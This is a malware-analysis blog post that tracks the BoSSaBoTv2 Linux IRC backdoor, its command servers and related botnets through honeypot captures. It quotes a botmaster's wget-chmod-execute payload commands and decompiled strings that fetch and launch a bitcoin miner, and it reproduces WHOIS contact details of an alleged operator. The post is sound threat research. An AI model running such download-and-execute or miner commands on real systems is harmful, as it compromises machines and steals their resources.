[en] BoSSaBoTv2 : another Linux Backdoor IRC

Today, i was looking at my web honeypot and this one pay my attention : http://www.malekal.com/modsec/index.php?ip=
The PHP vulnerability is very used (already wrote something about it : http://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linux-tsunami-a/ ) but it was the first time i saw thoses base64decode code.

The code lead to haxmeup.uni.me ( – OVH) that redirect to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg
I expect to get a PHP-Shellbot as usual, but this time, it was a FUD binary : https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/1409041374/

so i launch it :



made a connection to (OVH again) port 8067, there is an ircd behind :

nmap -sV -p 8067

Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST
Nmap scan report for
Host is up (0.027s latency).
8067/tcp open irc Unreal ircd
Service Info: Host: irc.wix.wix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds

so an IRC Backdoor.

Another surprise, the ircd doesnt have any mod to hide users etc.
~40 bots, not so much.
So let’s play.

on the screenshot bellow, we can that the bostmaster launch a range IP scan, then some bots Exploit some servers.
We can see that the exploit at was successfull because it joins the channel as a new bot.
BoSSaBoTv2_ircbackdoor4confirmed by my VM.
We got an other DNS con32.cz.cc that give the same IP

Two new bots :


The IRCd is new around ~40 bots in 9 days :


The botmaster made regularly download new binary – all from www.bilder-upload.eu (seems legitim)

!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
!BOSS* SH mv /tmp/05fbc4-1409059856.jpg  /tmp/4L2nJG5Vab
!BOSS* SH chmod 777 /tmp/4L2nJG5Vab
!BOSS* SH /tmp/4L2nJG5Vab

Some Hashs and Hosts recap :
haxmeup.uni.me / con32.cz.cc / con64.cz.cc ( – OVH)



then i wrote a little script to send the email abuse, hope, they will lose some bots 🙂



MalwareMustDie decompile the binary, some strings : http://pjjoint.malekal.com/files.php?read=20140826_n7h14d5w5i6
Thanks to them.

Bitcoin capabilities :

000000007BC0   /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
000000007C20   pkill minerd ; pkill m32 ; pkill m64
000000007C60   wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
000000007CC0   tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
000000007D00   NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s 
000000007D40   pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s

The most interresting :

000000007E1D   BoSSaBoTv2-%s

a search at Google this topic on http://www.hackforums.net/showthread.php?tid=4395309
According the date post, the kit is new and the price is at 100$


EDIT – September 8

Back, lot of attacks this WE :


Binaries are undetected


IRCd : port 53


EDIT – September 21 2014 : Two botnets

We found two differents botnets involved.
In the previous edit, you can see some screenshots with a channel #w00t
The IRCd move to IRC.DREAMBOXDB.COM ( (binary http://malwaredb.malekal.com/index.php?hash=b40b2d32fe4eadea78ac469782c3963613c405813b0f994ce0bd7de800d20737).

Sloboz network

The guy behind this botnet seems to be Romanian :


He made download a .tgz : http://malwaredb.malekal.com/index.php?hash=61fbbfd71c43a27c96c07a82edab4ee9
The file crond is a binary detected as Spyware.Unix.Mech.A : https://www.virustotal.com/fr/file/68aef1145b4e208cf6600d2ccda0080d8ec7a7fe97354b92a7378b81975fbb63/analysis/


it’s an IRCBackdoor – it connects to channels #linuxmafia and #m@trix on differents ircd including undernet network.
We can see the master is imp / sloboz / demo with a 23.* range IP (same Range as the BossaBackdoor C&C)

































So i connect to undernet and the guy sloboz was also connected.
He use the same IP as the BossaBackdoor C&C :



As you can see there some G-Lined resulting of Virus Detection, this is the .tgz IRCBackdoor.


I also find this old topic where someone claim to get his nickname stolen on undernet network: http://www.undernet.org/forum/viewtopic.php?f=4&t=9471&start=0
The victim said that the author is : *** HeyHey is sloboz@
The range lead to a Romaniam IP Range.

According this Urban dictionnary : http://www.urbandictionary.com/define.php?term=sloboz
There is also a City in Romania called Slobozia.

Seems he lose all his bots.

very pleased to see that antivirus has moved for his binary : https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/

SHA256: bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9
Nom du fichier : vti-rescan
Ratio de détection : 16 / 53
Date d’analyse : 2014-09-15 09:55:35 UTC (il y a 6 jours, 3 heures)
Antivirus Résultat Mise à jour
Ad-Aware Backdoor.BossaBot.A 20140915
Avast ELF:BossaBot-A [Trj] 20140915
BitDefender Backdoor.BossaBot.A 20140915
DrWeb Linux.BackDoor.Irc.4 20140915
Emsisoft Backdoor.BossaBot.A (B) 20140915
F-Secure Backdoor.BossaBot.A 20140915
GData Backdoor.BossaBot.A 20140915
Ikarus Backdoor.BossaBot 20140915
Kaspersky HEUR:Backdoor.Linux.Bassobo.a 20140915
MicroWorld-eScan Backdoor.BossaBot.A 20140915
Norman BossaBot.A 20140914
Sophos Linux/BosaBot-A 20140915
Symantec Linux.Backdoor.Kaiten 20140915
Tencent Win32.Backdoor.Gen.Ugrc 20140915
TrendMicro-HouseCall ELF_BASSBOT.A 20140915
nProtect Backdoor.BossaBot.A 20140914

Snk / sult4n network

The second botnet – 2598 local users, if all are bots, this is not bad.
Notice the name Sult4n server.Bossa_sult4n

Binary : http://malwaredb.malekal.com/index.php?hash=132397a7e793fb4052f8d44634a15582 – C&C SRV5050.CO ; KA3EK.COM ; IRCQFRUM.COM ( & 8RB.SU (
All theses domains are registered with the email address : sullt4n@hotmail.com

Administrative Contact ID: CR170538145
Administrative Contact Name: Sultan AL-Ghamdi
Administrative Contact Address1: Saudi arabia
Administrative Contact City: RiyadH
Administrative Contact State/Province: RiyadH
Administrative Contact Postal Code: 102345
Administrative Contact Country: Saudi Arabia
Administrative Contact Country Code: SA
Administrative Contact Phone Number: +966.533888508
Administrative Contact Email: sullt4n@hotmail.com


A look at Google give others old domains registed with the same IPs used as C&C for Windows IRC Backdoor : zerx-virus.biz and x01bkr2.biz

  • April 2009 : http://www.threatexpert.com/report.aspx?md5=7b3006772b76a997d4fc93e6c7b30142
  • Mars 2010 : MSN Worms : http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm%253aWin32%252fPushbot.FB&ThreatID=124698&Search=true#tab=2
  • July 2013 http://www.threatexpert.com/report.aspx?md5=a5e0f5419ce9d9f8e2aa1e241ca0505c

The address SRV5050.CO was well known because i made a write up on it, about Win32.Phorpiex a Skype Worm (in French) : http://www.malekal.com/2013/01/26/backdoor-irc-snk-se-propage-par-skype/
This worm was used to push FakeAv, Urausy Ransomware, Crypted Ransomware, Spambot and others malwares.
exposedbotnets.com call him « Snk » : http://www.exposedbotnets.com/2013/04/x01bkr2biz-snk-asper-mod-irc-botnet.html

This guy is very active for years!

EDIT – May 5 2015 : Comeback

Around 15th April, new attack to push some BossaBot.
Still PHP attacks :

and ShellShock attempt with two differents URLs :

BoSSaBot_April_2015_attack2 BoSSaBot_April_2015_attack


IRCd :



The domain is suspended : https://twitter.com/malekal_morte/status/595496401041231872

EDIT – September 2015 : still active

Some day ago, got this ShellShock Attempt but the link was not working.
I reconize the URL used by BossaBot.


Today more ShellShock Attempt, all from OVH.
Here the list :


Also some PHP stuffs as before :

Binaries are old, 5 mouths old :


but detections are still average :

SHA256: 5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af
Nom du fichier : susu2
Ratio de détection : 14 / 56
Date d’analyse : 2015-09-24 05:39:01 UTC (il y a 2 minutes)
Antivirus Résultat Mise à jour
AVG Linux/Tsunami 20150924
AhnLab-V3 Linux/Ssabobot.B 20150923
Avast ELF:Tsunami-BH [Cryp] 20150924
CAT-QuickHeal Linux.Ropys.PR6b5 20150924
DrWeb Linux.BackDoor.Sessox.1 20150924
ESET-NOD32 a variant of Linux/Tsunami.NAL 20150924
GData Linux.Trojan.Agent.750WU5 20150924
Jiangmin Backdoor/Linux.oo 20150922
Kaspersky HEUR:Backdoor.Linux.Ropys.a 20150924
NANO-Antivirus Trojan.Unix.Ropys.drxdby 20150924
Sophos Mal/Generic-S 20150923
Symantec Linux.Susiribot 20150923
Tencent Linux.Backdoor.Ropys.Liha 20150924
Zillya Trojan.Tsunami.Linux.80 20150923

The IRCd is at (Cloud-Servers)
Same IRCd mod as before.


gonna ping some abuse =)

EDIT – 6 October : stil active

still new binaries, MalwareMustDie made also an interresting tweet with an image link : http://t.co/OgNkLxSQGe


(Visité 434 fois, 1 visites ce jour)

Vous pouvez aussi lire...

Vous pouvez lire les articles et tutoriels suivants en rapport avec cette page :
Comprendre les licences Windows et activation WindowsTutoriel NoScript

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com